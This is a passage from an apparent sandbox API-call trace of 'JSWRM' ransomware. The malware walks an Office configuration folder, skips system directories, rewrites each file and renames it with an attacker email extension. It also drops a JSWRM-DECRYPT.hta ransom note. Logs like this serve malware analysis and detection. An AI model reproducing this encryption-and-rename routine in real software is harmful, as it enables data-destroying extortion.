office\\root\\office16\\configuration\\card_expiration_terms_dict.txt.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.230] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x17728794, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x17728794, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1774e9ab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8cc, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="card_security_terms_dict.txt", cAlternateFileName="CARD_S~1.TXT")) returned 1 [0129.230] lstrcmpiW (lpString1="card_security_terms_dict.txt", lpString2=".") returned 1 [0129.230] lstrcmpiW (lpString1="card_security_terms_dict.txt", lpString2="..") returned 1 [0129.230] lstrcmpiW (lpString1="card_security_terms_dict.txt", lpString2="...") returned 1 [0129.230] lstrcmpiW (lpString1="card_security_terms_dict.txt", lpString2="windows") returned -1 [0129.230] lstrcmpiW (lpString1="card_security_terms_dict.txt", lpString2="recovery") returned -1 [0129.230] lstrcmpiW (lpString1="card_security_terms_dict.txt", lpString2="perflogs") returned -1 [0129.230] lstrcmpiW (lpString1="card_security_terms_dict.txt", lpString2="documents and settings") returned -1 [0129.230] lstrcmpiW (lpString1="card_security_terms_dict.txt", lpString2="$RECYCLE.BIN") returned 1 [0129.230] lstrcmpiW (lpString1="card_security_terms_dict.txt", lpString2="system volume information") returned -1 [0129.230] lstrcmpiW (lpString1="card_security_terms_dict.txt", lpString2="msocache") returned -1 [0129.230] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="card_security_terms_dict.txt", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0129.230] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="card_security_terms_dict.txt", cchWideChar=28, lpMultiByteStr=0x2410d8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="card_security_terms_dict.txt", lpUsedDefaultChar=0x0) returned 28 [0129.230] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="card_security_terms_dict.txt", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0129.230] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="card_security_terms_dict.txt", cchWideChar=28, lpMultiByteStr=0x2412b8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="card_security_terms_dict.txt", lpUsedDefaultChar=0x0) returned 28 [0129.230] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.230] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.230] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Configuration\\card_security_terms_dict.txt" (normalized: "c:\\program files\\microsoft office\\root\\office16\\configuration\\card_security_terms_dict.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0129.231] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2252) returned 1 [0129.231] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.231] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x8c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x8c0, lpOverlapped=0x0) returned 1 [0129.232] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.233] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x8c0, lpOverlapped=0x0) returned 1 [0129.233] CloseHandle (hObject=0x238) returned 1 [0129.233] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Configuration\\card_security_terms_dict.txt" (normalized: "c:\\program files\\microsoft office\\root\\office16\\configuration\\card_security_terms_dict.txt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Configuration\\card_security_terms_dict.txt.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\configuration\\card_security_terms_dict.txt.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.234] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x17728794, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x17728794, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1774e9ab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x143e, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="card_terms_dict.txt", cAlternateFileName="CARD_T~1.TXT")) returned 1 [0129.234] lstrcmpiW (lpString1="card_terms_dict.txt", lpString2=".") returned 1 [0129.234] lstrcmpiW (lpString1="card_terms_dict.txt", lpString2="..") returned 1 [0129.234] lstrcmpiW (lpString1="card_terms_dict.txt", lpString2="...") returned 1 [0129.234] lstrcmpiW (lpString1="card_terms_dict.txt", lpString2="windows") returned -1 [0129.234] lstrcmpiW (lpString1="card_terms_dict.txt", lpString2="recovery") returned -1 [0129.234] lstrcmpiW (lpString1="card_terms_dict.txt", lpString2="perflogs") returned -1 [0129.234] lstrcmpiW (lpString1="card_terms_dict.txt", lpString2="documents and settings") returned -1 [0129.234] lstrcmpiW (lpString1="card_terms_dict.txt", lpString2="$RECYCLE.BIN") returned 1 [0129.234] lstrcmpiW (lpString1="card_terms_dict.txt", lpString2="system volume information") returned -1 [0129.234] lstrcmpiW (lpString1="card_terms_dict.txt", lpString2="msocache") returned -1 [0129.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="card_terms_dict.txt", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0129.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="card_terms_dict.txt", cchWideChar=19, lpMultiByteStr=0x2411c8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="card_terms_dict.txt", lpUsedDefaultChar=0x0) returned 19 [0129.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="card_terms_dict.txt", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0129.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="card_terms_dict.txt", cchWideChar=19, lpMultiByteStr=0x2412b8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="card_terms_dict.txt", lpUsedDefaultChar=0x0) returned 19 [0129.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.234] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Configuration\\card_terms_dict.txt" (normalized: "c:\\program files\\microsoft office\\root\\office16\\configuration\\card_terms_dict.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0129.235] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5182) returned 1 [0129.235] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.235] ReadFile (in: hFile=0x238, lpBuffer=0x278330, nNumberOfBytesToRead=0x1430, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e89c*=0x1430, lpOverlapped=0x0) returned 1 [0129.237] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.237] WriteFile (in: hFile=0x238, lpBuffer=0x278330*, nNumberOfBytesToWrite=0x1430, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e898*=0x1430, lpOverlapped=0x0) returned 1 [0129.237] CloseHandle (hObject=0x238) returned 1 [0129.237] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Configuration\\card_terms_dict.txt" (normalized: "c:\\program files\\microsoft office\\root\\office16\\configuration\\card_terms_dict.txt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Configuration\\card_terms_dict.txt.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\configuration\\card_terms_dict.txt.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.238] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1774e9ab, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1774e9ab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1774e9ab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x10283, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="config.xml", cAlternateFileName="")) returned 1 [0129.238] lstrcmpiW (lpString1="config.xml", lpString2=".") returned 1 [0129.238] lstrcmpiW (lpString1="config.xml", lpString2="..") returned 1 [0129.238] lstrcmpiW (lpString1="config.xml", lpString2="...") returned 1 [0129.238] lstrcmpiW (lpString1="config.xml", lpString2="windows") returned -1 [0129.238] lstrcmpiW (lpString1="config.xml", lpString2="recovery") returned -1 [0129.238] lstrcmpiW (lpString1="config.xml", lpString2="perflogs") returned -1 [0129.238] lstrcmpiW (lpString1="config.xml", lpString2="documents and settings") returned -1 [0129.238] lstrcmpiW (lpString1="config.xml", lpString2="$RECYCLE.BIN") returned 1 [0129.238] lstrcmpiW (lpString1="config.xml", lpString2="system volume information") returned -1 [0129.238] lstrcmpiW (lpString1="config.xml", lpString2="msocache") returned -1 [0129.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="config.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="config.xml", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="config.xml", lpUsedDefaultChar=0x0) returned 10 [0129.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="config.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="config.xml", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="config.xml", lpUsedDefaultChar=0x0) returned 10 [0129.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.238] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Configuration\\config.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\configuration\\config.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0129.239] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=66179) returned 1 [0129.239] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.239] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x10280, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x10280, lpOverlapped=0x0) returned 1 [0129.245] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.245] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x10280, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x10280, lpOverlapped=0x0) returned 1 [0129.246] CloseHandle (hObject=0x238) returned 1 [0129.246] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Configuration\\config.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\configuration\\config.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Configuration\\config.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\configuration\\config.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.247] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43aed959, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x43aed959, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x43aed959, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0129.247] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0129.247] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0129.247] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0129.247] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0129.247] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0129.247] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0129.247] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0129.247] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0129.247] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0129.247] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0129.247] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0129.247] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240ef8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0129.247] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0129.247] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0129.247] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x17728794, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x17728794, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x17728794, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x171e, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="ssn_high_group_info.txt", cAlternateFileName="SSN_HI~1.TXT")) returned 1 [0129.247] lstrcmpiW (lpString1="ssn_high_group_info.txt", lpString2=".") returned 1 [0129.247] lstrcmpiW (lpString1="ssn_high_group_info.txt", lpString2="..") returned 1 [0129.247] lstrcmpiW (lpString1="ssn_high_group_info.txt", lpString2="...") returned 1 [0129.247] lstrcmpiW (lpString1="ssn_high_group_info.txt", lpString2="windows") returned -1 [0129.247] lstrcmpiW (lpString1="ssn_high_group_info.txt", lpString2="recovery") returned 1 [0129.247] lstrcmpiW (lpString1="ssn_high_group_info.txt", lpString2="perflogs") returned 1 [0129.247] lstrcmpiW (lpString1="ssn_high_group_info.txt", lpString2="documents and settings") returned 1 [0129.248] lstrcmpiW (lpString1="ssn_high_group_info.txt", lpString2="$RECYCLE.BIN") returned 1 [0129.248] lstrcmpiW (lpString1="ssn_high_group_info.txt", lpString2="system volume information") returned -1 [0129.248] lstrcmpiW (lpString1="ssn_high_group_info.txt", lpString2="msocache") returned 1 [0129.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ssn_high_group_info.txt", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0129.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ssn_high_group_info.txt", cchWideChar=23, lpMultiByteStr=0x2413d0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ssn_high_group_info.txt", lpUsedDefaultChar=0x0) returned 23 [0129.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ssn_high_group_info.txt", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0129.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ssn_high_group_info.txt", cchWideChar=23, lpMultiByteStr=0x240fe8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ssn_high_group_info.txt", lpUsedDefaultChar=0x0) returned 23 [0129.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.248] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Configuration\\ssn_high_group_info.txt" (normalized: "c:\\program files\\microsoft office\\root\\office16\\configuration\\ssn_high_group_info.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0129.248] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5918) returned 1 [0129.249] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.249] ReadFile (in: hFile=0x238, lpBuffer=0x278330, nNumberOfBytesToRead=0x1710, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e89c*=0x1710, lpOverlapped=0x0) returned 1 [0129.250] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.250] WriteFile (in: hFile=0x238, lpBuffer=0x278330*, nNumberOfBytesToWrite=0x1710, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e898*=0x1710, lpOverlapped=0x0) returned 1 [0129.251] CloseHandle (hObject=0x238) returned 1 [0129.251] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Configuration\\ssn_high_group_info.txt" (normalized: "c:\\program files\\microsoft office\\root\\office16\\configuration\\ssn_high_group_info.txt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Configuration\\ssn_high_group_info.txt.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\configuration\\ssn_high_group_info.txt.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.251] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x17728794, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x17728794, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x17728794, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x171e, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="ssn_high_group_info.txt", cAlternateFileName="SSN_HI~1.TXT")) returned 0 [0129.252] FindClose (in: hFindFile=0x231dc0 | out: hFindFile=0x231dc0) returned 1 [0129.252] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc7c80c48, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc7c80c48, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xca4703d4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2ee58, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="CONTAB32.DLL", cAlternateFileName="")) returned 1 [0129.252] lstrcmpiW (lpString1="CONTAB32.DLL", lpString2=".") returned 1 [0129.252] lstrcmpiW (lpString1="CONTAB32.DLL", lpString2="..") returned 1 [0129.252] lstrcmpiW (lpString1="CONTAB32.DLL", lpString2="...") returned 1 [0129.252] lstrcmpiW (lpString1="CONTAB32.DLL", lpString2="windows") returned -1 [0129.252] lstrcmpiW (lpString1="CONTAB32.DLL", lpString2="recovery") returned -1 [0129.252] lstrcmpiW (lpString1="CONTAB32.DLL", lpString2="perflogs") returned -1 [0129.252] lstrcmpiW (lpString1="CONTAB32.DLL", lpString2="documents and settings") returned -1 [0129.252] lstrcmpiW (lpString1="CONTAB32.DLL", lpString2="$RECYCLE.BIN") returned 1 [0129.252] lstrcmpiW (lpString1="CONTAB32.DLL", lpString2="system volume information") returned -1 [0129.252] lstrcmpiW (lpString1="CONTAB32.DLL", lpString2="msocache") returned -1 [0129.252] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CONTAB32.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.252] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CONTAB32.DLL", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CONTAB32.DLL", lpUsedDefaultChar=0x0) returned 12 [0129.252] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CONTAB32.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.252] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CONTAB32.DLL", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CONTAB32.DLL", lpUsedDefaultChar=0x0) returned 12 [0129.252] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4ee541, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e5cc4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="CONVERT", cAlternateFileName="")) returned 1 [0129.252] lstrcmpiW (lpString1="CONVERT", lpString2=".") returned 1 [0129.252] lstrcmpiW (lpString1="CONVERT", lpString2="..") returned 1 [0129.252] lstrcmpiW 